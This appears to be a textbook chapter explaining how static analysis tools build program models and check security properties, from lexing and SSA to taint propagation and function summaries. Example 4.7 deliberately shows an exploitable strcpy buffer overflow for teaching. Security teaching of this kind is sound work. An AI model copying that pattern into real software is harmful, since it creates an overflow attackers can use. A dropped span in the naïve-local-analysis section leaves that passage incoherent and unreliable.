The first thing a static analysis tool needs to do is transform the code to be analyzed into a program model, a set of data structures that represent the code. As you would expect, the model a tool creates is closely linked to the kind of analysis it performs, but generally static analysis tools borrow a lot from the compiler world. In fact, many static analysis techniques were developed by researchers working on compilers and compiler optimization problems. If you are interested in an in-depth look at compilers, we recommend both the classic textbook Compilers: Principles, Techniques, and Tools (often called “the dragon book”), by Aho, Lam, Sethi, and Ullman [Aho et al., 2006], and Appel’s Modern Compiler Implementation series (often called “the tiger books”) [Appel, 1998].

We now take a brief tour of the most important techniques and data structures that compilers and static analysis tools share.

Lexical Analysis

Tools that operate on source code begin by transforming the code into a series of tokens, discarding unimportant features of the program text such as whitespace or comments along the way. The creation of the token stream is called lexical analysis. Lexing rules often use regular expressions to identify tokens.
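To make the idea of a token stream concrete, here is a minimal hand-written lexer in C for a very small subset of the language: the keyword if, parentheses, brackets, =, ;, identifiers, whitespace, and // comments. It is a sketch under assumptions and not the way any particular tool works: it scans characters directly instead of using regular expressions, and the names `token_type`, `token`, and `lex` are hypothetical. Each token records its position in the text and its line number so that later stages can report errors.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>
#include <string.h>

enum token_type { TOK_IF, TOK_LPAREN, TOK_RPAREN, TOK_LBRACKET, TOK_RBRACKET,
                  TOK_EQUAL, TOK_SEMI, TOK_ID, TOK_UNKNOWN };

struct token {
    enum token_type type;
    const char *start;  /* points into the source text */
    size_t length;      /* number of characters in the token */
    int line;           /* 1-based line number, for error reporting */
};

/* Splits src into tokens, skipping whitespace and // comments.
 * Writes at most max tokens to out and returns the number written. */
size_t lex(const char *src, struct token *out, size_t max)
{
    assert(src != NULL && out != NULL);
    size_t n = 0;
    int line = 1;
    const char *p = src;
    while (*p != '\0' && n < max) {
        if (*p == '\n') { line++; p++; continue; }
        if (isspace((unsigned char)*p)) { p++; continue; }
        if (p[0] == '/' && p[1] == '/') {       /* comment: skip to end of line */
            while (*p != '\0' && *p != '\n') p++;
            continue;
        }
        struct token t = { TOK_UNKNOWN, p, 1, line };
        if (isalpha((unsigned char)*p) || *p == '_') {
            const char *q = p + 1;
            while (isalnum((unsigned char)*q) || *q == '_') q++;
            t.length = (size_t)(q - p);
            /* The only keyword in this subset is "if". */
            t.type = (t.length == 2 && strncmp(p, "if", 2) == 0) ? TOK_IF : TOK_ID;
        } else {
            switch (*p) {
            case '(': t.type = TOK_LPAREN;   break;
            case ')': t.type = TOK_RPAREN;   break;
            case '[': t.type = TOK_LBRACKET; break;
            case ']': t.type = TOK_RBRACKET; break;
            case '=': t.type = TOK_EQUAL;    break;
            case ';': t.type = TOK_SEMI;     break;
            default:  break;                 /* stays TOK_UNKNOWN */
            }
        }
        out[n++] = t;
        p += t.length;
    }
    return n;
}
```

A generated lexer built from regular-expression rules does the same job with less hand-written code; the explicit loop is used here only because it keeps the example self-contained.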
Example 4.1 gives a simple set of lexing rules that could be used to process the following C program fragment:

    if (ret) // probably true
      mat[x][y] = END_VAL;

This code produces the following sequence of tokens:

    IF LPAREN ID(ret) RPAREN ID(mat) LBRACKET ID(x) RBRACKET
    LBRACKET ID(y) RBRACKET EQUAL ID(END_VAL) SEMI

Notice that most tokens are represented entirely by their token type, but to be useful, the ID token requires an additional piece of information: the name of the identifier. To enable useful error reporting later, tokens should carry at least one other kind of information with them: their position in the source text (usually a line number and a column number).

For the simplest of static analysis tools, the job is nearly finished at this point. If all the tool is going to do is match the names of dangerous functions, the analyzer can go through the token stream looking for identifiers, match them against a list of dangerous function names, and report the results. This is the approach taken by ITS4, RATS, and Flawfinder.

Example 4.1 Sample lexical analysis rules.

    if                         { return IF; }
    (                          { return LPAREN; }
    )                          { return RPAREN; }
    [                          { return LBRACKET; }
    ]                          { return RBRACKET; }
    =                          { return EQUAL; }
    ;                          { return SEMI; }
    /[ \t\n]+/                 { /* ignore whitespace */ }
    /\/\/.*/                   { /* ignore comments */ }
    /[a-zA-Z_][a-zA-Z0-9_]*/   { return ID; }

Parsing

A language parser uses a context-free grammar (CFG) to match the token stream. The grammar consists of a set of productions that describe the symbols (elements) in the language. Example 4.2 lists a set of productions that are capable of parsing the sample token stream. (Note that the definitions for these productions would be much more involved for a full-blown language parser.)

Example 4.2 Production rules for parsing the sample token stream.
    stmt        := if_stmt | assign_stmt
    if_stmt     := IF LPAREN expr RPAREN stmt
    expr        := lval
    assign_stmt := lval EQUAL expr SEMI
    lval        := ID | arr_access
    arr_access  := ID arr_idx+
    arr_idx     := LBRACKET expr RBRACKET

The parser performs a derivation by matching the token stream against the production rules. If each symbol is connected to the symbol from which it was derived, a parse tree is formed. Figure 4.2 shows a parse tree created using the production rules from Example 4.2. We have omitted terminal symbols that do not carry names (IF, LPAREN, RPAREN, etc.), to make the salient features of the parse tree more obvious.

    stmt
      if_stmt
        expr
          lval
            ID(ret)
        stmt
          assign_stmt
            lval
              arr_access
                ID(mat)
                arr_idx
                  expr
                    lval
                      ID(x)
                arr_idx
                  expr
                    lval
                      ID(y)
            expr
              lval
                ID(END_VAL)

Figure 4.2 A parse tree derived from the sequence of tokens.

If you would like to build your own parser, the venerable UNIX programs Lex and Yacc have been the traditional way to start in C; if you can choose any language you like, we prefer JavaCC because it’s all-around easier to use and comes complete with a grammar for parsing Java. For C and C++, the Edison Design Group (EDG) sells an excellent front end. EDG sometimes makes its toolkit available for free for academic use. The open source Elsa C and C++ parser from U.C. Berkeley is another good option.

Abstract Syntax

It is feasible to do significant analysis on a parse tree, and certain types of stylistic checks are best performed on a parse tree because it contains the most direct representation of the code just as the programmer wrote it. However, performing complex analysis on a parse tree can be inconvenient for a number of reasons.
The nodes in the tree are derived directly from the grammar’s production rules, and those rules can introduce nonterminal symbols that exist purely for the purpose of making parsing easy and nonambiguous, rather than for the purpose of producing an easily understood tree; it is generally better to abstract away both the details of the grammar and the syntactic sugar present in the program text. A data structure that does these things is called an abstract syntax tree (AST). The purpose of the AST is to provide a standardized version of the program suitable for later analysis. The AST is usually built by associating tree construction code with the grammar’s production rules.

Figure 4.3 shows an AST for our example. Notice that the if statement now has an empty else branch, the predicate tested by the if is now an explicit comparison to zero (the behavior called for by C), and array access is uniformly represented as a binary operation.

    if_stmt
      NOT
        COMPARE_EQ
          ID(ret)
          0
      assign_stmt
        arr_idx
          arr_idx
            ID(mat)
            ID(x)
          ID(y)
        ID(END_VAL)
      NO_OP

Figure 4.3 An abstract syntax tree.

Depending on the needs of the system, the AST can contain a more limited number of constructs than the source language. For example, method calls might be converted to function calls, or for and do loops might be converted to while loops. Significant simplification of the program in this fashion is called lowering. Languages that are closely related, such as C and C++, can be lowered into the same AST format, although such lowering runs the risk of distorting the programmer’s intent. Languages that are syntactically similar, such as C++ and Java, might share many of the same AST node types but will almost certainly have special kinds of nodes for features found in only one language.

Semantic Analysis

As the AST is being built, the tool builds a symbol table alongside it.
For each identifier in the program, the symbol table associates the identifier with its type and a pointer to its declaration or definition.

With the AST and the symbol table, the tool is now equipped to perform type checking. A static analysis tool might not be required to report type-checking errors the way a compiler does, but type information is critically important for the analysis of an object-oriented language because the type of an object determines the set of methods that the object can invoke. Furthermore, it is usually desirable to at least convert implicit type conversions in the source text into explicit type conversions in the AST. For these reasons, an advanced static analysis tool has to do just as much work related to type checking as a compiler does.

In the compiler world, symbol resolution and type checking are referred to as semantic analysis because the compiler is attributing meaning to the symbols found in the program. Static analysis tools that use these data structures have a distinct advantage over tools that do not. For example, they can correctly interpret the meaning of overloaded operators in C++ or determine that a Java method named doPost() is, in fact, part of an implementation of HttpServlet. These capabilities enable a tool to perform useful checks on the structure of the program. We use the term structural analysis for these kinds of checks. For more, see the sidebar “Checking Structural Rules.”

After semantic analysis, compilers and more advanced static analysis tools part ways. A modern compiler uses the AST and the symbol and type information to generate an intermediate representation, a generic version of machine code that is suitable for optimization and then conversion into platform-specific object code. The path for static analysis tools is less clear cut.
Depending on the type of analysis to be performed, a static analysis tool might perform additional transformations on the AST or might generate its own variety of intermediate representation suitable to its needs.

If a static analysis tool uses its own intermediate representation, it generally allows for at least assignment, branching, looping, and function calls (although it is possible to handle function calls in a variety of ways; we discuss function calls in the context of interprocedural analysis in Section 4.4). The intermediate representation that a static analysis tool uses is usually a higher-level view of the program than the intermediate representation that a compiler uses. For example, a C language compiler likely will convert all references to structure fields into byte offsets into the structure for its intermediate representation, while a static analysis tool more likely will continue to refer to structure fields by their names.

Checking Structural Rules

While he was an intern at Fortify, Aaron Siegel created a language for describing structural program properties. In the language, a property is defined by a target AST node type and a predicate that must be true for an instance of that node type to match. Two examples follow.

In Java, database connections should not be shared between threads; therefore, database connections should not be stored in static fields. To find static fields that hold database connections, we write

    Field: static and == "java.sql.Connection"

In C, the statement

    buf = realloc(buf, 256);

causes a memory leak if realloc() fails and returns null. To flag such statements, we write

    FunctionCall c1: (
      c1.function is [name == "realloc"] and
      c1 in [AssignmentStatement: rhs is c1 and lhs == c1.arguments[0]]
    )

Tracking Control Flow

Many static analysis algorithms (and compiler optimization techniques) explore the different execution paths that can take place when a function is executed.
To make these algorithms efficient, most tools build a control flow graph on top of the AST or intermediate representation. The nodes in a control flow graph are basic blocks: sequences of instructions that will always be executed starting at the first instruction and continuing to the last instruction, without the possibility that any instructions will be skipped. Edges in the control flow graph are directed and represent potential control flow paths between basic blocks. Back edges in a control flow graph represent potential loops. Consider the C fragment in Example 4.3.

Example 4.3 A C program fragment consisting of four basic blocks.

    if (a > b) {
      nConsec = 0;
    } else {
      s1 = getHexChar(1);
      s2 = getHexChar(2);
    }
    return nConsec;

Figure 4.4 presents the control flow graph for the fragment. The four basic blocks are labeled bb0 through bb3. In the example, the instructions in each basic block are represented in source code form, but a basic block data structure in a static analysis tool would likely hold pointers to AST nodes or the nodes for the tool’s intermediate representation.

When a program runs, its control flow can be described by the series of basic blocks it executes. A trace is a sequence of basic blocks that defines a path through the code. There are only two possible execution paths through the code in Example 4.3 (the branch is either taken or not). These paths are represented by two unique traces through the control flow graph in Figure 4.4: [ bb0, bb1, bb3 ] and [ bb0, bb2, bb3 ].

[Figure 4.4: control flow graph. bb0 (the test a > b) branches to bb1 (nConsec = 0;) and to bb2 (the two getHexChar() assignments); bb1 and bb2 both lead to bb3 (return nConsec;).]
Figure 4.4 A control flow graph with four basic blocks.

A call graph represents potential control flow between functions or methods. In the absence of function pointers or virtual methods, constructing a call graph is simply a matter of looking at the function identifiers referenced in each function.
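As an aside on the control flow graph described above, the graph and its traces can be represented with a small adjacency structure. The C sketch below is illustrative only: `struct cfg`, `cfg_add_edge`, and `cfg_count_traces` are hypothetical names, the fixed array sizes are arbitrary, and the recursive count assumes an acyclic graph, so it would not terminate on a graph with back edges.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_BLOCKS 16
#define MAX_SUCCS  2

/* A control flow graph stored as successor lists of basic-block indices. */
struct cfg {
    size_t block_count;
    size_t succ_count[MAX_BLOCKS];
    size_t succ[MAX_BLOCKS][MAX_SUCCS];
};

/* Adds a directed edge between two existing basic blocks. */
void cfg_add_edge(struct cfg *g, size_t from, size_t to)
{
    assert(g != NULL && from < g->block_count && to < g->block_count);
    assert(g->succ_count[from] < MAX_SUCCS);
    g->succ[from][g->succ_count[from]++] = to;
}

/* Counts the distinct traces that lead from one block to exit_block.
 * Assumes no back edges: a loop in the graph would recurse forever. */
size_t cfg_count_traces(const struct cfg *g, size_t from, size_t exit_block)
{
    assert(g != NULL && from < g->block_count);
    if (from == exit_block) {
        return 1;
    }
    size_t total = 0;
    for (size_t i = 0; i < g->succ_count[from]; i++) {
        total += cfg_count_traces(g, g->succ[from][i], exit_block);
    }
    return total;
}
```

Building the four-block graph from Figure 4.4 (edges bb0 to bb1, bb0 to bb2, bb1 to bb3, and bb2 to bb3) and counting traces from bb0 to bb3 yields the two traces listed in the text. The same successor-list layout would also serve for a call graph, with functions in place of basic blocks.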
Nodes in the graph represent functions, and directed edges represent the potential for one function to invoke another. Example 4.4 shows a program with three functions, and Figure 4.5 shows its call graph. The call graph makes it clear that larry can call moe or curly, and moe can call curly or call itself again recursively.

Example 4.4 A short program with three functions.

    int moe(int scissors);  /* forward declarations so the calls below compile */
    int curly(void);

    int larry(int fish) {
      if (fish) {
        moe(1);
      } else {
        curly();
      }
      return 0;
    }

    int moe(int scissors) {
      if (scissors) {
        curly();
        moe(0);
      } else {
        curly();
      }
      return 0;
    }

    int curly(void) {
      /* empty */
      return 0;
    }

[Figure 4.5: call graph with nodes larry, moe, and curly. Edges: larry to moe, larry to curly, moe to curly, and moe to itself.]
Figure 4.5 The call graph for the program in Example 4.4.

When function pointers or virtual methods are invoked, the tool can use a combination of dataflow analysis (discussed next) and data type analysis to limit the set of potential functions that can be invoked from a call site. If the program loads code modules dynamically at runtime, there is no way to be sure that the control flow graph is complete because the program might run code that is not visible at the time of analysis.

For software systems that span multiple programming languages or consist of multiple cooperating processes, a static analysis tool will ideally stitch together a control flow graph that represents the connections between the pieces. For some systems, the configuration files hold the data needed to span the call graphs in different environments.

Tracking Dataflow

Dataflow analysis algorithms examine the way data move through a program. Compilers perform dataflow analysis to allocate registers, remove dead code, and perform many other optimizations.

Dataflow analysis usually involves traversing a function’s control flow graph and noting where data values are generated and where they are used. Converting a function to Static Single Assignment (SSA) form is useful for many dataflow problems. A function in SSA form is allowed to assign a value to a variable only once.
To accommodate this restriction, new variables must be introduced into the program. In the compiler literature, the new variables are usually represented by appending a numeric subscript to the original variable’s name, so if the variable x is assigned three times, the rewritten program will refer to variables x1, x2, and x3.

SSA form is valuable because, given any variable in the program, it is easy to determine where the value of the variable comes from. This property has many applications. For example, if an SSA variable is ever assigned a constant value, the constant can replace all uses of the SSA variable. This technique is called constant propagation. Constant propagation by itself is useful for finding security problems such as hard-coded passwords or encryption keys.

Example 4.5 lists an excerpt from the Tiny Encryption Algorithm (TEA). The excerpt first appears as it normally would in the program source text and next appears in SSA form. This example is simple because it is straight-line code without any branches.

Example 4.5 An excerpt from the TEA encryption algorithm, both in its regular source code form and in static single assignment form.

Regular source code form:

    sum = sum + delta;
    sum = sum & top;
    y = y + (z<<4)+k[0] ^ z+sum ^ (z>>5)+k[1];
    y = y & top;
    z = z + (y<<4)+k[2] ^ y+sum ^ (y>>5)+k[3];
    z = z & top;

SSA form (the trailing digit on each name is the SSA subscript):

    sum2 = sum1 + delta1;
    sum3 = sum2 & top1;
    y2 = y1 + (z1<<4)+k1[0] ^ z1+sum3 ^ (z1>>5)+k1[1];
    y3 = y2 & top1;
    z2 = z1 + (y3<<4)+k1[2] ^ y3+sum3 ^ (y3>>5)+k1[3];
    z3 = z2 & top1;

If a variable is assigned different values along different control flow paths, in SSA form, the variable must be reconciled at the point where the control flow paths merge. SSA accomplishes this merge by introducing a new version of the variable and assigning the new version the value from one of the two control flow paths. The notational shorthand for this merge point is called a φ-function.
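One way to get a feel for single assignment and for the merge step is to write them out by hand in C, where a `const` local cannot be reassigned. The sketch below is an illustration only: the function names are hypothetical, and a real tool builds SSA form from the control flow graph instead of rewriting source text. The first function conditionally overwrites a variable; the second defines every name exactly once and uses a conditional expression to play the role of the φ-function at the merge point.

```c
#include <assert.h>

/* Ordinary form: tail is assigned on one path and left alone on the other. */
unsigned char tail_plain(int bytesRead, unsigned char tail)
{
    assert(bytesRead >= 0);
    if (bytesRead < 8) {
        tail = (unsigned char)bytesRead;
    }
    return tail;
}

/* Hand-written single-assignment form: each name is defined exactly once
 * (const enforces that), and the merge selects a value by path taken. */
unsigned char tail_single_assignment(const int bytesRead1,
                                     const unsigned char tail1)
{
    assert(bytesRead1 >= 0);
    const int branch_taken = (bytesRead1 < 8);
    /* Value tail would receive on the "then" path. */
    const unsigned char tail2 = (unsigned char)bytesRead1;
    /* Stands in for phi(tail1, tail2) at the point where the paths merge. */
    const unsigned char tail3 = branch_taken ? tail2 : tail1;
    return tail3;
}
```

Both functions return the same result for every input. The difference is that in the second one the origin of each value can be read off from a single definition, which is the property that makes SSA form convenient for dataflow analysis.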
The φ-function stands in for the selection of the appropriate value, depending upon the control flow path that is executed. Example 4.6 gives an example in which conversion to SSA form requires introducing a φ-function.

Example 4.6 Another example of conversion to SSA form. The code is shown first in its regular source form and then in its SSA form. In this case, two control flow paths merge at the bottom of the if block, and the variable tail must be reconciled using a φ-function.

Regular source form:

    if (bytesRead < 8) {
      tail = (byte) bytesRead;
    }

SSA form:

    if (bytesRead1 < 8) {
      tail2 = (byte) bytesRead1;
    }
    tail3 = φ(tail1, tail2);

Taint Propagation

Security tools need to know which values in a program an attacker could potentially control. Using dataflow to determine what an attacker can control is called taint propagation. It requires knowing where information enters the program and how it moves through the program. Taint propagation is the key to identifying many input validation and representation defects. For example, a program that contains an exploitable buffer overflow vulnerability almost always contains a dataflow path from an input function to a vulnerable operation. We discuss taint propagation further when we look at analysis algorithms and then again when we look at rules.

The concept of tracking tainted data is not restricted to static analysis tools. Probably the best-known implementation of dynamic taint propagation is Perl’s taint mode, which uses a runtime mechanism to make sure that user-supplied data are validated against a regular expression before they are used as part of a sensitive operation.

Pointer Aliasing

Pointer alias analysis is another dataflow problem. The purpose of alias analysis is to understand which pointers could possibly refer to the same memory location.
Alias analysis algorithms describe pointer relationships with terms such as “must alias,” “may alias,” and “cannot alias.” Many compiler optimizations require some form of alias analysis for correctness. For example, a compiler would be free to reorder the following two statements only if the pointers p1 and p2 do not refer to the same memory location:

    *p1 = 1;
    *p2 = 2;

For security tools, alias analysis is important for performing taint propagation. A flow-sensitive taint-tracking algorithm needs to perform alias analysis to understand that data flow from getUserInput() to processInput() in the following code:

    p1 = p2;
    *p1 = getUserInput();
    processInput(*p2);

It is common for static analysis tools to assume that pointers (at least pointers that are passed as function arguments) do not alias. This assumption seems to hold often enough for many tools to produce useful results, but it could cause a tool to overlook important results.

4.2 Analysis Algorithms

The motivation for using advanced static analysis algorithms is to improve context sensitivity, that is, to determine the circumstances and conditions under which a particular piece of code runs. Better context sensitivity enables a better assessment of the danger the code represents. It’s easy to point at all calls to strcpy() and say that they should be replaced, but it’s much harder to call special attention to only the calls to strcpy() that might allow an attacker to overflow a buffer.

Any advanced analysis strategy consists of at least two major pieces: an intraprocedural analysis component for analyzing an individual function, and an interprocedural analysis component for analyzing interaction between functions. Because the names intraprocedural and interprocedural are so similar, we use the common vernacular terms local analysis to mean intraprocedural analysis, and global analysis to mean interprocedural analysis.
Figure 4.6 diagrams the local analysis and global analysis components, and associates the major data structures commonly used by each.

Figure 4.6 An analysis algorithm includes a local component and a global component. (Local analysis: AST and control flow graph. Global analysis: call graph.)

Checking Assertions

Many security properties can be stated as assertions that must be true for the program to be secure. To check for a buffer overflow in the following line of code:

    strcpy(dest, src);

imagine adding this assertion to the program just before the call to strcpy():

    assert(alloc_size(dest) > strlen(src));

If the program logic guarantees that this assertion will always succeed, no buffer overflow is possible.[1] If there is a set of conditions under which the assertion might fail, the analyzer should report a potential buffer overflow. This same assertion-based approach works equally well for defining the requirements for avoiding SQL injection, cross-site scripting, and most of the other vulnerability categories we discuss in this book.

For the remainder of this section, we treat static analysis as an assertion-checking problem. Choosing the set of assertions to make is the topic of Section 4.3, leaving this section to discuss how assertion checking can be performed. Drawing a distinction between the mechanics of performing the check and the particulars of what should be checked is valuable for more than just explicative purposes; it is also a good way to build a static analysis tool. By separating the checker from the set of things to be checked, the tool can quickly be adapted to find new kinds of problems or prevented from reporting issues that are not problems. From an engineering standpoint, designing a checker and deciding what to check are both major undertakings, and conflating them would make for an implementation quagmire.
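The strcpy() assertion above can be illustrated with a minimal Python sketch. It assumes the analyzer has already worked out the allocated size of dest and a set of possible lengths for src; the function names check_strcpy and strcpy_assertion_holds are hypothetical and do not come from any tool discussed here.

```python
def strcpy_assertion_holds(alloc_size, src_len):
    """Model of assert(alloc_size(dest) > strlen(src)).

    The comparison is strict because strcpy() also writes a null terminator.
    """
    return alloc_size > src_len


def check_strcpy(alloc_size, possible_src_lengths):
    """Report a potential overflow if any possible length violates the assertion."""
    failing = [n for n in possible_src_lengths
               if not strcpy_assertion_holds(alloc_size, n)]
    if failing:
        return "potential buffer overflow when strlen(src) = %d" % min(failing)
    return "safe"


# An 8-byte buffer holds strings of length 0..7; length 8 overflows by one byte.
print(check_strcpy(8, range(0, 8)))
print(check_strcpy(8, range(0, 9)))
```

The checker itself knows nothing about strcpy() beyond the assertion it is handed, which reflects the separation between the checking mechanism and the properties to be checked.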
Footnote 1. For the purposes of this example, we have made up a function named alloc_size() that returns the number of allocated bytes that its argument points to. Note that the size of dest must be strictly greater than the string length of src. If the destination buffer is exactly the same size as the source string, strcpy() will write a null terminator outside the bounds of dest.

We typically see three varieties of assertions that arise from security properties:

• The most prevalent forms of security problems arise from programmers who trust input when they should not, so a tool needs to check assertions related to the level of trust afforded to data as they move through the program. These are the taint propagation problems. SQL injection and cross-site scripting are two vulnerability types that will cause a tool to make assertions about taint propagation. In the simplest scenario, a data value is either tainted (potentially controlled by an attacker) or untainted. Alternatively, a piece of data might carry one or more particular kinds of taint. An attacker might be able to control the contents of a buffer but not the size of the buffer, for example.

• Looking for exploitable buffer overflow vulnerabilities leads to assertions that are similar to the ones that arise from taint propagation, but determining whether a buffer can be overflowed requires tracking more than just whether tainted data are involved; the tool also needs to know the size of the buffer and the value used as an index. We term these range analysis problems because they require knowing the range of potential values a variable (or a buffer size) might have.

• In some cases, tools are less concerned with particular data values and more concerned with the state of an object as the program executes. This is called type state: variables can have a different type at each point in the code.
For example, imagine a memory region as being in either the allocated state (after malloc() returns a pointer to it) or the freed state (entered when it is passed to the function free()). If a program gives up all references to the memory while it is in the allocated state, the memory is leaked. If a pointer to the memory is passed to free() when it is in the freed state, a double free vulnerability is present. Many such temporal safety properties can be expressed as small finite-state automata (state machines).

Naïve Local Analysis

With assertion checking in mind, we approach static analysis from a naïve perspective, demonstrate the difficulties that arise, and then discuss how static analysis tools overcome these difficulties. Our effort here is to provide an informal perspective on the kinds of issues that make static analysis challenging. Consider a simple piece of code:

    x = 1;
    y = 1;
    assert(x < y);

How could a static analysis tool evaluate the assertion? One could imagine keeping track of all the facts we know about the code before each statement is executed, as follows:

    x = 1;             {} (no facts)
    y = 1;             { x = 1 }
    assert (x < y);    { x = 1, y = 1 }

When the static analysis tool reaches the assertion, it can evaluate the expression x < y in the context of the facts it has collected. By substituting the variables’ values in the assertion, the expression becomes this:

    1 < 1

This is always false, so the assertion will never hold and the tool should report a problem with the code. This same technique could also be applied even if the values of the variables are nonconstant:

    x = v;
    y = v;
    assert(x < y);

Again tracking the set of facts known before each statement is executed, we have this:

    x = v;             {} (no facts)
    y = v;             { x = v }
    assert (x < y);    { x = v, y = v }

Substituting the variable values in the assert statement yields this: v 0) However, the assert statement does not require this.
If we are interested in having a program reach a final state r, we can write a predicate transformer for deriving the weakest precondition for an assert statement as follows:

    WP(assert(p), r) = p ∧ r

Predicate transformers are appealing because, by generating a precondition for a body of code, they abstract away the details of the program and create a summary of the requirements that the program imposes on the caller.

Model Checking

For temporal safety properties, such as “memory should be freed only once” and “only non-null pointers should be dereferenced,” it is easy to represent the property being checked as a small finite-state automaton. Figure 4.7 shows a finite-state automaton for the property “memory should be freed only once.” A model checking approach accepts such properties as specifications, transforms the program to be checked into an automaton (called the model), and then compares the specification to the model. For example, in Figure 4.7, if the model checker can find a variable and a path through the program that will cause the specification automaton to reach its error state, the model checker has identified the potential for a double free vulnerability.

Figure 4.7 A finite-state automaton for the temporal safety property “memory should be freed only once.” (States: initial state, freed, error. A call to free(x) moves the automaton from the initial state to freed and from freed to error; other operations leave the state unchanged.)

Global Analysis

The simplest possible approach to global analysis is to ignore the issue, to assume that all problems will evidence themselves if the program is examined one function at a time. This is a particularly bad assumption for many security problems, especially those related to input validation and representation, because identifying these problems often requires looking across function boundaries. Example 4.7 shows a program that contains a buffer overflow vulnerability.
To identify the vulnerability, a tool needs to track that an unbounded amount of data from the environment (argv[0]) is being passed from main() to setname() and copied into a fixed-size buffer. Just about all advanced security tools make an effort to identify bugs that involve more than one function.

Example 4.7 Accurately identifying this buffer overflow vulnerability requires looking across function boundaries.

    static char progName[128];

    void setname(char* newName) {
      strcpy(progName, newName);
    }

    int main(int argc, char* argv[]) {
      setname(argv[0]);
    }

The most ambitious approach to global analysis is whole-program analysis, whose objective is to analyze every function with a complete understanding of the context of its calling functions. This is an extreme example of a context-sensitive analysis, whose objective is to take into account the context of the calling function when it determines the effects of a function call. A conceptually simple way to achieve whole-program analysis is inlining, replacing each function call in the program with the definition of the called function. (Recursion presents a challenge.) Other approaches are also possible, including the use of a stack-based analysis model. Regardless of the technique, whole-program analysis can require a lot of time, a lot of memory, or both.

A more flexible approach to global analysis is to leverage a local analysis algorithm to create function summaries. With a function summary approach, when a local analysis algorithm encounters a function call, the function’s summary is applied as a stand-in for the function. A function’s summary can be very precise (and potentially very complex) or very imprecise (and presumably less complex), allowing the summary-generation and storage algorithm to make a trade-off between precision and scalability.
A function summary might include both requirements that the calling context must meet (preconditions) and the effect that the function has had on the calling context when it returns (postconditions). Example 4.8 shows a summary for the C standard library function memcpy(). In English, the summary says: “memcpy() requires that its callers ensure that the size of the dest buffer and the size of the src buffer are both greater than or equal to the value of the len parameter. When it returns, memcpy() guarantees that the values in dest will be equal to the values in src in locations 0 through the value of len minus 1.”

Example 4.8 A summary for the C function memcpy().

    memcpy(dest, src, len) [
      requires: ( alloc_size(dest) >= len ) ∧ ( alloc_size(src) >= len )
      ensures: ∀ i ∈ 0 .. len-1: dest[i]' == src[i]
    ]

Building and using function summaries often implies that global analysis is carried out by a work-queue algorithm that uses a local analysis subroutine to find bugs and produce function summaries. Example 4.9 gives pseudocode for two procedures that together implement a work-queue algorithm for performing global analysis. The analyze_program() procedure accepts two parameters: a program to be analyzed and a set of function summaries. The initial set of summaries might be characterizations for library functions. It first builds a call graph, then queues up all the functions in the program, and then pulls functions off the queue and analyzes each one until the queue is empty. The analyze_function() procedure relies on a local analysis algorithm (not shown) that checks the function for vulnerabilities and also updates the function summary, if necessary. If a function’s summary is updated, all the callers of the function need to be analyzed again so that they can use the new summary. Depending on the specifics of the analysis, it might be possible to speed up analyze_program() by adjusting the order in which individual functions are analyzed.
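As a runnable illustration of the work-queue procedure just described, here is a small Python sketch. It makes several simplifying assumptions that are not part of the original text: a program is a dictionary mapping each function name to the set of functions it calls, a summary is a single Boolean meaning "may reach an unsafe library call," and the local analysis is a stand-in that only combines callee summaries. A real tool would carry far richer summaries.

```python
from collections import deque


def build_callgraph(program):
    """Return a map from each function to the set of functions that call it."""
    callers = {f: set() for f in program}
    for caller, callees in program.items():
        for callee in callees:
            if callee in callers:  # library functions have no body to revisit
                callers[callee].add(caller)
    return callers


def do_local_analysis(f, program, summaries):
    """Toy local analysis: f is unsafe if any function it calls is unsafe."""
    summaries[f] = any(summaries.get(callee, False) for callee in program[f])


def analyze_function(f, program, queue, queued, cg, summaries):
    old = summaries[f]
    do_local_analysis(f, program, summaries)
    if summaries[f] != old:
        # The summary changed, so every caller must be analyzed again.
        for g in cg[f]:
            if g not in queued:
                queue.append(g)
                queued.add(g)


def analyze_program(program, summaries):
    cg = build_callgraph(program)
    for f in program:
        summaries.setdefault(f, False)
    queue = deque(program)
    queued = set(program)
    while queue:
        f = queue.popleft()
        queued.discard(f)
        analyze_function(f, program, queue, queued, cg, summaries)
    return summaries


# Hypothetical input: main() calls setname(), which calls strcpy().
program = {"main": {"setname"}, "setname": {"strcpy"}, "helper": {"puts"}}
library = {"strcpy": True, "puts": False}  # initial summaries for library code
result = analyze_program(program, dict(library))
print(result["main"], result["setname"], result["helper"])
```

Here main is analyzed once before setname has a useful summary and is queued again after setname's summary changes, which is the re-analysis step the text describes. Because summaries in this toy only ever change from False to True, the loop is guaranteed to terminate.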
Example 4.9 Pseudocode for a global analysis algorithm using function summaries.

    analyze_program(p, summaries) {
      cg = build_callgraph(p)
      for each function f in p {
        add f to queue
      }
      while (queue is not empty) {
        f = first function in queue
        remove f from queue
        analyze_function(f, queue, cg, summaries);
      }
    }

    analyze_function(f, queue, cg, summaries) {
      old = get summary for f from summaries
      do_local_analysis(f, summaries);
      new = get summary for f from summaries
      if (old != new) {
        for each function g in cg that calls f {
          if (g is not in queue) {
            add g to queue
          }
        }
      }
    }

Research Tools

The following is a brief overview of some of the tools that have come out of research labs and universities in the last few years:[2]

• ARCHER is a static analysis tool for checking array bounds. (The name stands for ARray CHeckER.) ARCHER uses a custom-built solver to perform a path-sensitive interprocedural analysis of C programs. It has been used to find more than a dozen security problems in Linux, and it has found hundreds of array bounds errors in OpenBSD, Sendmail, and PostgreSQL [Xie et al., 2003].

• The tool BOON applies integer range analysis to determine whether a C program is capable of indexing an array outside its bounds [Wagner et al., 2000]. Although it is capable of finding many errors that lexical analysis tools would miss, the checker is still imprecise: It ignores statement order, it can’t model interprocedural dependencies, and it ignores pointer aliasing.

• Inspired by Perl’s taint mode, CQual uses type qualifiers to perform a taint analysis to detect format string vulnerabilities in C programs [Foster et al., 2002]. CQual requires a programmer to annotate a small number of variables as either tainted or untainted, and then uses type-inference rules (along with preannotated system libraries) to propagate the qualifiers. After the qualifiers have been propagated, the system can detect format string vulnerabilities by type checking.
• The Eau Claire tool uses a theorem prover to create a general specification-checking framework for C programs [Chess, 2002]. It can be used to find such common security problems as buffer overflows, file access race conditions, and format string bugs. The system checks the use of standard library functions using prewritten specifications. Developers can also use specifications to ensure that function implementations behave as expected. Eau Claire is built on the same philosophical foundation as the extended static checking tool ESC/Java2 [Flanagan et al., 2002].

• LAPSE, short for Lightweight Analysis for Program Security in Eclipse, is an Eclipse plug-in targeted at detecting security vulnerabilities in J2EE applications. It performs taint propagation to connect sources of Web input with potentially sensitive operations. It detects vulnerabilities such as SQL injection, cross-site scripting, cookie poisoning, and parameter manipulation [Livshits and Lam, 2005].

